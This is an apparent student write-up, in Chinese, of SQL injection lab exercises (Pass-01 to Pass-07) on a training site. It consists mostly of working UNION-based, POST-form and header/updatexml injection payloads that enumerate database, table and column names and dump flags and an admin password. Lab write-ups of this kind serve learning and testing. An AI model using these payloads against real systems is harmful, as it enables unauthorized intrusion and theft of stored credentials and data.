<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211125233836329.png" alt="image-20211125233836329"></p>
<h5 id="库名："><a href="#库名：" class="headerlink" title="库名："></a>库名：</h5><p>​    库名查询语句：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://inject2b.lab.aqlab.cn/Pass-01/index.php?id=1 and 1=2 union select 1,2,database()</span><br></pre></td></tr></table></figure>

<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211125231730066.png" alt="image-20211125231730066"></p>
<p>得到库名是: error</p>
<h5 id="表名："><a href="#表名：" class="headerlink" title="表名："></a>表名：</h5><ul>
<li>表名-1查询语句：</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://inject2b.lab.aqlab.cn/Pass-01/index.php?id=1 and 1=2 union select 1,2,table_name from information_schema.tables where table_schema =&#x27;error&#x27; limit 0,1</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">易错点：1=2不能写成1 =2   不能有空格！</span><br></pre></td></tr></table></figure>

<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211126002420189.png" alt="image-20211126002420189"></p>
<p>如上图，我们得到了第一张表，表-1：error_flag</p>
<ul>
<li>​    表名-2查询语句：</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1 and 1=2 union select 1,2,table_name from information_schema.tables where table_schema =&#x27;error&#x27; limit 0,2</span><br></pre></td></tr></table></figure>

<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211125234118315.png" alt="image-20211125234118315"></p>
<p>如上图，得到表名（2）是：user</p>
<p>总结：到目前获得了两张表：表1-error_flag  ,  表2：user表</p>
<p>接下啦再查询出这两张表各自的列名（字段名）。</p>
<h5 id="列名："><a href="#列名：" class="headerlink" title="列名："></a>列名：</h5><p>列名查询之【user表】：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">and 1=2 union select 1,2,column_name from information_schema.columns where table_name =&#x27;user&#x27; limit 0,1</span><br></pre></td></tr></table></figure>

<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211126004853082.png" alt="image-20211126004853082"></p>
<p>使用如上查询语句，我们发现，使用limit 0,1查询数据，只能一个一个数据的查询，这里再学习一个新函数group_concat(),此函数可以一次性地把查询到的结果<strong>一次性的全部显示出来</strong>。</p>
<p>查询【表2】user表的所有字段：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name =&#x27;user&#x27; and table_schema = database()</span><br></pre></td></tr></table></figure>

<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211126004328507.png" alt="image-20211126004328507"></p>
<p>然后我们得到了【表2】user表的三个字段：</p>
<ol>
<li><p>Id</p>
</li>
<li><p>username</p>
</li>
<li><p>password</p>
</li>
</ol>
<p>同样地，使用group_concat()函数，也可以查询到【表1】error_flag有2个字段，如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name =&#x27;error_flag&#x27; and table_schema = database()</span><br></pre></td></tr></table></figure>

<ol>
<li>Id</li>
<li>flag</li>
</ol>
<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211126005404938.png" alt="image-20211126005404938"></p>
<p>直到现在，我们</p>
<p>知道了库名：</p>
<p>知道了两张表的表名：</p>
<p>知道了两张表的列名：</p>
<p>就可以查询这两张表的所有数据。</p>
<h5 id="获取数据"><a href="#获取数据" class="headerlink" title="获取数据"></a>获取数据</h5><p>查询【表2-user】password字段的所有数据：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">and 1=2 union select 1,2,group_concat(password) from user</span><br></pre></td></tr></table></figure>

<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211209215938613.png" alt="image-20211209215938613"></p>
<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211209213845099.png" alt="image-20211209213845099"></p>
<p>经过测试，flag不在表2里面。</p>
<p>查询【表1-error_flag】flag字段的所有数据：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">and 1=2 union select 1,2,group_concat(flag) from error_flag</span><br></pre></td></tr></table></figure>

<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211126005928056.png" alt="image-20211126005928056"></p>
<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211209213547477.png" alt="image-20211209213547477"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1 and 1=2 union select 1,2,group_concat(flag) from error_flag</span><br></pre></td></tr></table></figure>

<p>经过测试，表的第一个值即为flag。flag：zKaQ-Nf</p>
<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211209220418199.png" alt="image-20211209220418199"></p>
<h3 id="pass-02"><a href="#pass-02" class="headerlink" title="pass-02"></a>pass-02</h3><h4 id="显错注入（二）"><a href="#显错注入（二）" class="headerlink" title="显错注入（二）"></a>显错注入（二）</h4><h5 id="解题思路-1"><a href="#解题思路-1" class="headerlink" title="解题思路"></a>解题思路</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">1.判断是否存在注入：</span><br><span class="line">	&#x27;and 1=2 -- qwe</span><br><span class="line">2.判断字段数：</span><br><span class="line">	&#x27;and 1=2 order by 3 -- qwe</span><br><span class="line">3.找出显错位：</span><br><span class="line">	&#x27;and 1=2 union select 1,2,3 -- qwe</span><br><span class="line">4.查询库名</span><br><span class="line">	&#x27;and 1=2 union select 1,2,database() -- qwe</span><br><span class="line">5.查询表名</span><br><span class="line">	&#x27;and 1=2 union select 1,2,table_name from information_schema.tables where table_schema =database() limit 0,1 -- qwe</span><br><span class="line">6.查询列名</span><br><span class="line">	&#x27;and 1=2 union select 1,2,column_name frominformation_schema.columns where table_schema =database() where table_name =&#x27;表名&#x27; limit 0,1 -- qwe</span><br><span class="line">7.获取数据</span><br><span class="line">	&#x27;and 1=2 union select 1,2,group_concat(字段名) from 表名 -- qwe</span><br></pre></td></tr></table></figure>



<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211126210801419.png" alt="image-20211126210801419"></p>
<h5 id="查询库名："><a href="#查询库名：" class="headerlink" title="查询库名："></a>查询库名：</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">找出先错位，直接替换啊</span><br><span class="line">https://inject2b.lab.aqlab.cn/Pass-02/index.php?id=1 &#x27;and 1=2 union select 1,database(),3 --+</span><br></pre></td></tr></table></figure>

<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211126211222844.png" alt="image-20211126211222844"></p>
<p>如上图，查询到仍然是error数据库，接下来判断表名</p>
<h5 id="查询表名："><a href="#查询表名：" class="headerlink" title="查询表名："></a>查询表名：</h5><p>表名查询语句：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">https://inject2b.lab.aqlab.cn/Pass-02/index.php</span><br><span class="line">?id=1 &#x27;and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+</span><br></pre></td></tr></table></figure>

<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211126215740168.png" alt="image-20211126215740168"></p>
<p>如上图，得到两个表 error_flag 表和user表</p>
<p>group_concat()正确</p>
<p>concat()错误</p>
<p>熟悉的单词以为不会写错！结果错了</p>
<p>?id=1 ‘’ and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() –+</p>
<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211126211759133.png" alt="image-20211126211759133"></p>
<h5 id="查询列名："><a href="#查询列名：" class="headerlink" title="查询列名："></a>查询列名：</h5><p>列名查询语句(user表)：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">https://inject2b.lab.aqlab.cn/Pass-02/index.php?id=1 &#x27;and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=&#x27;user&#x27; --+</span><br><span class="line"></span><br><span class="line">注意：</span><br><span class="line">	易错点：=两边的不需要空格！</span><br><span class="line">	表后缀有s tables columns</span><br><span class="line">	当作字段的时候没有s</span><br></pre></td></tr></table></figure>



<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211126220702125.png" alt="image-20211126220702125"></p>
<p>通过查询知道，user表是三个字段：Id、username、password</p>
<hr>
<p>列名查询语句(error_flag表)：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">https://inject2b.lab.aqlab.cn/Pass-02/index.php?</span><br><span class="line">id=1 &#x27;and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=&#x27;error_flag&#x27; --+</span><br></pre></td></tr></table></figure>

<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211126220844889.png" alt="image-20211126220844889"></p>
<p>​        至此，两个表的表名和字段/列名都知道了，想查哪个字段的记录就很容易了，因为第一题的flag在error_flag表的flag字段里面，所以可以先查询一下error_flag表的flg字段</p>
<p>列名查询语句(error_flag表)：</p>
<h5 id="获取数据-1"><a href="#获取数据-1" class="headerlink" title="获取数据"></a>获取数据</h5><p>​        查询【表-error_flag】Id和flag字段的所有数据：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">https://inject2b.lab.aqlab.cn/Pass-02/index.php</span><br><span class="line">?id=1 &#x27;and 1=2 union select 1,group_concat(Id),group_concat(flag)from error_flag --+</span><br></pre></td></tr></table></figure>

<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211126222934725-16379369772171.png" alt="image-20211126222934725"></p>
<p>​        查询结果如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Your Login name:1,2,3,4</span><br><span class="line">Your Password:zKaQ-Nf,zKaQ-BJY,zKaQ-XiaoFang,zKaq-98K</span><br></pre></td></tr></table></figure>

<p>​        经测试，flag为：zKaQ-BJY</p>
<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211209231519972.png" alt="image-20211209231519972"></p>
<p>———————————————————— 完！————————————————————–</p>
<h3 id="pass-03"><a href="#pass-03" class="headerlink" title="pass-03"></a>pass-03</h3><h4 id="显错注入（三）"><a href="#显错注入（三）" class="headerlink" title="显错注入（三）"></a>显错注入（三）</h4><h5 id="解题思路："><a href="#解题思路：" class="headerlink" title="解题思路："></a>解题思路：</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">1.判断是否存在注入：</span><br><span class="line">	&#x27;)and 1=2 -- qwe</span><br><span class="line">2.判断字段数：</span><br><span class="line">	&#x27;)and 1=2 order by 3 -- qwe</span><br><span class="line">3.找出显错位：</span><br><span class="line">	&#x27;)and 1=2 union select 1,2,3 -- qwe</span><br><span class="line">4.查询库名</span><br><span class="line">	&#x27;)and 1=2 union select 1,2,database() -- qwe</span><br><span class="line">5.查询表名</span><br><span class="line">	&#x27;)and 1=2 union select 1,2,table_name from information_schema.tables where table_schema =database() limit 0,1 -- qwe</span><br><span class="line">6.查询列名</span><br><span class="line">	&#x27;)and 1=2 union select 1,2,column_name frominformation_schema.columns where table_schema =database() where table_name =&#x27;表名&#x27; limit 0,1 -- qwe</span><br><span class="line">7.获取数据</span><br><span class="line">	&#x27;)and 1=2 union select 1,2,group_concat(字段名) from 表名 -- qwe</span><br></pre></td></tr></table></figure>

<h5 id="查询库名：-1"><a href="#查询库名：-1" class="headerlink" title="查询库名："></a>查询库名：</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://inject2b.lab.aqlab.cn/Pass-03/index.php?id=1 &#x27;)and 1=2 union select 1,2,database() --+</span><br></pre></td></tr></table></figure>

<p>得到库名：error</p>
<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211209233411877.png" alt="image-20211209233411877"></p>
<h5 id="查询表名：-1"><a href="#查询表名：-1" class="headerlink" title="查询表名："></a>查询表名：</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://inject2b.lab.aqlab.cn/Pass-03/index.php?id=1 &#x27;)and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+</span><br></pre></td></tr></table></figure>

<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211209233748287.png" alt="image-20211209233748287"></p>
<p>如上图，得到表名：error_flag、user</p>
<h5 id="查询列名：-1"><a href="#查询列名：-1" class="headerlink" title="查询列名："></a>查询列名：</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://inject2b.lab.aqlab.cn/Pass-03/index.php?id=1 &#x27;)and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=&#x27;error_flag&#x27; --+</span><br></pre></td></tr></table></figure>

<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211209234422472.png" alt="image-20211209234422472"></p>
<p>如上图，得到列名：error_flag、user</p>
<h5 id="获取数据-2"><a href="#获取数据-2" class="headerlink" title="获取数据"></a>获取数据</h5><p>查询error_flag表里面的flag字段</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://inject2b.lab.aqlab.cn/Pass-03/index.php?id=1 &#x27;)and 1=2 union select 1,group_concat(Id),group_concat(flag)from error_flag --+</span><br></pre></td></tr></table></figure>

<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211126224633027.png" alt="image-20211126224633027"></p>
<p>查询结果：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Your Login name:1,2,3,4</span><br><span class="line">Your Password:zKaQ-Nf,zKaQ-BJY,zKaQ-XiaoFang,zKaq-98K</span><br></pre></td></tr></table></figure>

<p>经测试，flag为：zKaQ-XiaoFang</p>
<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211126225025951.png" alt="image-20211126225025951"></p>
<p>​    </p>
<h3 id="pass-04"><a href="#pass-04" class="headerlink" title="pass-04"></a>pass-04</h3><h4 id="显错注入（四）"><a href="#显错注入（四）" class="headerlink" title="显错注入（四）"></a>显错注入（四）</h4><h5 id="解题思路：-1"><a href="#解题思路：-1" class="headerlink" title="解题思路："></a>解题思路：</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">1.判断是否存在注入：</span><br><span class="line">	&quot;)and 1=2 -- qwe</span><br><span class="line">2.判断字段数：</span><br><span class="line">	&quot;)and 1=2 order by 3 -- qwe</span><br><span class="line">3.找出显错位：</span><br><span class="line">	&quot;)and 1=2 union select 1,2,3 -- qwe</span><br><span class="line">4.查询库名</span><br><span class="line">	&quot;)and 1=2 union select 1,2,database() -- qwe</span><br><span class="line">5.查询表名</span><br><span class="line">	&quot;)and 1=2 union select 1,2,table_name from information_schema.tables where table_schema =database() limit 0,1 -- qwe</span><br><span class="line">6.查询列名</span><br><span class="line">	&quot;)and 1=2 union select 1,2,column_name frominformation_schema.columns where table_schema =database() where table_name =&#x27;表名&#x27; limit 0,1 -- qwe</span><br><span class="line">7.获取数据</span><br><span class="line">	&quot;)and 1=2 union select 1,2,group_concat(字段名) from 表名 -- qwe</span><br></pre></td></tr></table></figure>

<h5 id="查询库名：-2"><a href="#查询库名：-2" class="headerlink" title="查询库名："></a>查询库名：</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://inject2b.lab.aqlab.cn/Pass-04/index.php?id=1&quot;)and 1=2 union select 1,2,database() --+</span><br></pre></td></tr></table></figure>

<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211210000129383.png" alt="image-20211210000129383"></p>
<h5 id="查询表名：-2"><a href="#查询表名：-2" class="headerlink" title="查询表名："></a>查询表名：</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://inject2b.lab.aqlab.cn/Pass-04/index.php?id=1 &quot;)and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+</span><br></pre></td></tr></table></figure>

<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211210000215095.png" alt="image-20211210000215095"></p>
<h5 id="查询列名：-2"><a href="#查询列名：-2" class="headerlink" title="查询列名："></a>查询列名：</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://inject2b.lab.aqlab.cn/Pass-04/index.php?id=1 &quot;)and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=&#x27;error_flag&#x27; --+</span><br></pre></td></tr></table></figure>

<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211210000318034.png" alt="image-20211210000318034"></p>
<h5 id="获取数据-3"><a href="#获取数据-3" class="headerlink" title="获取数据"></a>获取数据</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">https://inject2b.lab.aqlab.cn/Pass-04/index.php?id=1 &quot;)and 1=2 union select 1,group_concat(Id),group_concat(flag)from error_flag --+</span><br><span class="line"></span><br><span class="line">https://inject2b.lab.aqlab.cn/Pass-04/index.php?id=1&quot;)and 1=2 union select 1,group_concat(Id),group_concat(flag)from error_flag --+</span><br></pre></td></tr></table></figure>

<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211210000447018.png" alt="image-20211210000447018"></p>
<p>查询结果如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Your Login name:1,2,3,4</span><br><span class="line">Your Password:zKaQ-Nf,zKaQ-BJY,zKaQ-XiaoFang,zKaq-98K</span><br></pre></td></tr></table></figure>

<p>经测试，flag为：zKaq-98K</p>
<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211126231110393.png" alt="image-20211126231110393"></p>
<h3 id="总结："><a href="#总结：" class="headerlink" title="总结："></a>总结：</h3><h3 id="pass-05"><a href="#pass-05" class="headerlink" title="pass-05"></a>pass-05</h3><p>POST注入（一）</p>
<p>解题思路</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">判断是否存在注入：</span><br><span class="line">8&#x27; or 1=1 -- qwe</span><br><span class="line">判断字段数：</span><br><span class="line">8&#x27; or 1=1 order by 3 -- qwe</span><br></pre></td></tr></table></figure>

<p>判断回显点：<br>8’ or 1=2 union select 11,22,33 – qwe</p>
<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211127211402323.png" alt="image-20211127211402323"></p>
<p>查询库名</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">8&#x27; or 1=2 union select 11,22,database() -- qwe</span><br></pre></td></tr></table></figure>

<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211127211831504.png" alt="image-20211127211831504"></p>
<p>查询表名</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">8&#x27; or 1=2 union select 11,22,group_concat(table_name) from information_schema.tables where table_schema=database() -- qwe</span><br><span class="line">查询到有两张表：flag表和user表</span><br></pre></td></tr></table></figure>

<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211127212544352.png" alt="image-20211127212544352"></p>
<p>查询列名</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">8&#x27; or 1=2 union select 11,22,group_concat(coLumn_name) from information_schema.columns where table_schema=database() and table_name=&#x27;flag&#x27; -- qwe</span><br><span class="line">注意flag要加单引号</span><br><span class="line">查询到flag表有两个字段：Id、flag</span><br></pre></td></tr></table></figure>



<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">8&#x27; or 1=2 union select 11,22,group_concat(coLumn_name) from information_schema.columns where table_schema=database() and table_name=&#x27;user&#x27; -- qwe</span><br><span class="line">查询到user表有两个字段：Id、password、username</span><br></pre></td></tr></table></figure>

<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/%E8%A1%A81-16380233536957.png" alt="表1"></p>
<p>查询数据</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">8&#x27; or 1=2 union select 11,group_concat(Id),group_concat(flag) from flag -- qwe</span><br><span class="line"></span><br><span class="line">Your Login name:1,2,3</span><br><span class="line">Your Password:zKaQ-PostK1,zKaQ-XZT,zKaQ-FlagA1</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">8&#x27; or 1=2 union select 11,group_concat(username),group_concat(password) from user -- qwe</span><br><span class="line"></span><br><span class="line">Your Login name:admin</span><br><span class="line">Your Password:as4dsa2dsad2a3</span><br></pre></td></tr></table></figure>

<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/2021-11-27_221249-16380225607851.png" alt="2021-11-27_221249-16380225607851"></p>
<p>经测试flag为：zKaQ-PostK1</p>
<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211127223525882.png" alt="image-20211127223525882"></p>
<h3 id="pass-06"><a href="#pass-06" class="headerlink" title="pass-06"></a>pass-06</h3><p>POST注入（二）</p>
<p>解题思路</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">判断存在注入</span><br><span class="line">8&quot;) or 1=1 -- qwe</span><br><span class="line">判断字段数：</span><br><span class="line">8&quot;) or 1=1 order by 3 -- qwe</span><br><span class="line">判断回显点：</span><br><span class="line">8&quot;) or 1=2 union select 11,22,33 -- qwe</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211127224407605.png" alt="image-20211127224407605"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">8&quot;) or 1=2 union select 11,group_concat(Id),group_concat(flag) from flag -- qwe</span><br><span class="line">Your Login name:1,2,3</span><br><span class="line">Your Password:zKaQ-PostK1,zKaQ-XZT,zKaQ-FlagA1</span><br></pre></td></tr></table></figure>

<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211127224546070.png" alt="image-20211127224546070"></p>
<p>flag:zKaQ-XZT</p>
<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211127224645164.png" alt="image-20211127224645164"></p>
<h3 id="pass-07"><a href="#pass-07" class="headerlink" title="pass-07"></a>pass-07</h3><p>Head注入（一）</p>
<p>解题思路</p>
<h4 id="表名"><a href="#表名" class="headerlink" title="表名"></a>表名</h4><p>‘or updatexml(1,concat(‘!’,(select group_concat(table_name) from information_schema.tables where table_schema=database() limit 0,1)),1),123) – qwe</p>
<p>flag_head,ip,refer,uagent,user</p>
<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211201204804176.png" alt="image-20211201204804176"></p>
<h4 id="列名"><a href="#列名" class="headerlink" title="列名"></a>列名</h4><p>表-flag_head的</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x27;or updatexml(1,concat(&#x27;!&#x27;,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=&#x27;flag_head&#x27;)),1),123) -- qwe</span><br></pre></td></tr></table></figure>

<p>Id,flag_h1</p>
<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211201205247954.png" alt="image-20211201205247954"></p>
<h4 id="记录"><a href="#记录" class="headerlink" title="记录"></a>记录</h4><p>表-flag_head的</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x27;or updatexml(1,concat(&#x27;!&#x27;,(select group_concat(flag_h1) from flag_head)),1),123) -- qwe</span><br></pre></td></tr></table></figure>

<p>zKaQ-YourHd,zKaQ-Refer,zKaQ-ipi</p>
<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211201205852708.png" alt="image-20211201205852708"></p>
<h4 id="flag："><a href="#flag：" class="headerlink" title="flag："></a>flag：</h4><p>zKaQ-YourHd</p>
<p><img src="/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211201210101442.png" alt="image-20211201210101442"></p>
<p>列名</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x27;or updatexml(1,concat(&#x27;!&#x27;,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=&#x27;flag_head&#x27;)),1),123) -- qwe</span><br></pre></td></tr></table></figure>



